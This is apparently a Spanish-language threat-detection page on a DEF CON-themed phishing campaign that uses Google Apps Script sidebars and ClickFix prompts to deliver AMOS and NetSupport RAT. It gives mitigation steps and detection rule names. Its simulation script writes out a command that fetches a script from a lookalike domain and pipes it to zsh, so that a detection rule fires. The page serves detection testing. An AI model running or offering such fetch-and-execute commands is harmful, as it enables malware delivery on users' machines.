Phishing temático de DEF CON abusa de Google Apps Script para entrega de malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenaza están apuntando a los asistentes de conferencias de ciberseguridad a través de la ingeniería social en X, anteriormente Twitter, para distribuir malware usando Google Docs armados e instaladores fraudulentos de DocSend. La campaña entrega el infostealer AMOS a usuarios de macOS, mientras que las víctimas de Windows reciben una carga útil de múltiples etapas que involucra NetSupport RAT y un implante de billetera Ledger. El ataque abusa de las barras laterales de Google Apps Script y de las indicaciones estilo ClickFix para reducir la sospecha y desencadenar la ejecución de código malicioso.
Investigación
Los investigadores de Huntress interactuaron con el actor de amenaza haciéndose pasar por un ejecutivo de CoinDesk para observar toda la cadena de ataque. La investigación descubrió un proceso sofisticado de múltiples etapas que involucra Google Apps Script, instaladores falsos firmados con certificados robados y un proxy local que intercepta TLS en Windows. Los investigadores también identificaron una etapa secundaria que ejecuta JavaScript en memoria y despliega una autoridad certificadora fraudulenta.
Mitigación
Los usuarios deben tratar como sospechosas las solicitudes inesperadas de ejecutar comandos de terminal, eludir Gatekeeper o instalar actualizaciones manuales desde las barras laterales del documento. Las organizaciones deben monitorear la actividad inusual de Google Apps Script y el uso no autorizado de certificados de firma de código. Controles de punto final robustos y la verificación independiente de enlaces para compartir documentos pueden reducir aún más la exposición.
Respuesta
Si se detecta actividad maliciosa, el sistema afectado debe ser aislado inmediatamente para detener la exfiltración de datos o el movimiento lateral. Los respondedores deben preservar la evidencia forense y considerar reimaginar el dispositivo mientras tratan las credenciales locales y los datos de billeteras de criptomonedas como comprometidos. Las sesiones activas deben ser revocadas, las contraseñas restablecidas y todas las claves API o secretos almacenados en el sistema rotados.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Comandos y Control Sospechosos por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Intento Sospechoso de Ejecución de Curl [MacOS] (vía cmdline)
Posible Ejecución por Uso de Nombre Corto de Script (vía cmdline)
Llamar Métodos .NET Sospechosos desde Powershell (vía powershell)
IOCs (HashSha256) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware
IOCs (HashMd5) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware
IOCs (SourceIP) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware
IOCs (DestinationIP) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware
Detección de Implementación de DocSend y NetSupport RAT Troyanizados [Creación de Procesos de Windows]
Ejecución Potencial de Script Shell Malicioso en macOS [Creación de Procesos de Linux]
Detección de Comunicación Maliciosa y Entrega de Carga Útil [Conexión de Red de Windows]
Detectar Creación y Ejecución de Script PowerShell Malicioso [Powershell de Windows]
## Ejecución de Simulación
Requisito Previo: La Comprobación de Telemetría y Línea Base Pre-vuelo debe haber pasado.
Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.
-
Narrativa del Ataque y Comandos: El adversario planea obtener acceso inicial en una estación de trabajo macOS haciéndose pasar por un proceso legítimo de actualización de la API de Google. Utilizan una táctica de ingeniería social donde se instruye al usuario a ejecutar un comando en el Terminal. El comando utiliza
curlpara obtener una carga desdeapple-googleapi.com(un dominio tipográfico/parecido) y canaliza la salida directamente azsh. Este enfoque de «vivir de la tierra» intenta minimizar el rastro forense en el sistema de archivos ejecutando el código directamente desde la transmisión de la red. -
Script de Prueba de Regresión:
#!/bin/bash # Script de simulación para activar la regla "Ejecución Potencial de Script Shell Malicioso". # Nota: Usamos una URL ficticia que imita la estructura del dominio para evitar llamadas externas reales si se desea, # pero para que la regla se dispare, la línea de comando DEBE contener 'apple-googleapi.com'. echo "[*] Iniciando simulación: Imitando canalización de shell malicioso..." # Este comando satisface todas las condiciones: # 1. El proceso es zsh/sh/bash # 2. Contiene 'curl' # 3. Contiene '| zsh' # 4. Contiene 'apple-googleapi.com' # Usamos una URL inexistente para prevenir la ejecución real de la carga útil mientras sigue generando la telemetría. curl -s http://apple-googleapi.com/update.sh | zsh echo "[*] Comando de simulación enviado." -
Comandos de Limpieza:
# No se crean archivos en disco por el comando de ataque en sí mismo, # pero si se generaron artefactos, deben eliminarse. rm -f ~/Downloads/update.sh 2>/dev/null echo "[*] Limpieza completa."